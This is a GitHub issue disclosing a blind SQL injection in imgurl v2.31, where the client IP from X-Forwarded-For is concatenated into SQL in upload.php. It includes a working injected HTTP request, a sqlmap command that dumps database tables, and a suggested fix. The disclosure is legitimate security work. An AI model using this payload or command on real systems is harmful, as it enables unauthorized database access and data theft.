Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Blind SQL Injection Vulnerability #75

Open
Bronya-Rayi opened this issue Apr 11, 2022 · 1 comment
Open

Blind SQL Injection Vulnerability #75

Bronya-Rayi opened this issue Apr 11, 2022 · 1 comment

Comments

@Bronya-Rayi
Copy link

Description (漏洞描述)

imgurl v2.31

Multiple ways are used to obtain user ip (使用了多种方法获取用户ip)

image

Then splice the user ip directly into the sql statement in lines 44 to 58 of upload.php(在upload.php的44到58行中,直接将ip拼接到了sql语句中)

image

query->uplimit($ip)

image

Proof of Concept

GET /upload/localhost HTTP/1.1
Host: host.local
Cookie: XSRF-TOKEN=[Your_XSRF-TOKEN]; 
x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc-- 
Connection: close

image

image

Command for injection using sqlmap

python3 sqlmap.py -r http.txt --prefix="' union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " -level 3 -risk 3 --dbms sqlite -technique=B --text-only -T img_options -D values --dump

image

Repair method (修复方法)

Check user ip format or use PDO to prevent sql injection (检查用户ip格式或使用PDO来防止sql注入)
@xulei1112
Copy link

牛逼

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Bronya-Rayi @xulei1112